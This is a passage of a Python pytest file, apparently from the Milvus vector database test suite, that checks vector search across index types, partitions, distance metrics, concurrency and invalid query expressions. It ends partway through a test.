def init_binary_data(connect, collection, nb=3000, insert=True, partition_tags=None):
'''
Generate entities and add it in collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_tags is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_search_flat_top_k(self, connect, collection, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = 16385
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
search_params=search_param)
connect.load_collection(collection)
if index_type == "FLAT":
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=[default_tag])
else:
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res) == nq
assert len(res[0]) == top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=["new_tag"])
else:
connect.load_collection(collection)
with pytest.raises(Exception) as e:
connect.search(collection, query, partition_tags=["new_tag"])
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query, partition_tags=["(.*)tag"])
assert not check_id_result(res[0], ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new(.*)"])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
def test_search_collection_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, query)
@pytest.mark.level(2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.level(2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
'''
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
@pytest.mark.skip("r0.3-test")
def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
"""
target: test search with field, and let return entities less than topk
method: insert entities and build ivf_ index, and search with field, n_probe=1
expected:
"""
entities, ids = init_data(connect, id_collection, auto_id=False)
simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
connect.create_index(id_collection, field_name, simple_index)
# logging.getLogger().info(connect.get_collection_info(id_collection))
top_k = 300
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
search_params={"nprobe": 1})
expr = {"must": [gen_default_vector_expr(default_query)]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(id_collection)
res = connect.search(id_collection, query, fields=["int64"])
assert len(res) == nq
for r in res[0]:
assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
@pytest.mark.level(2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
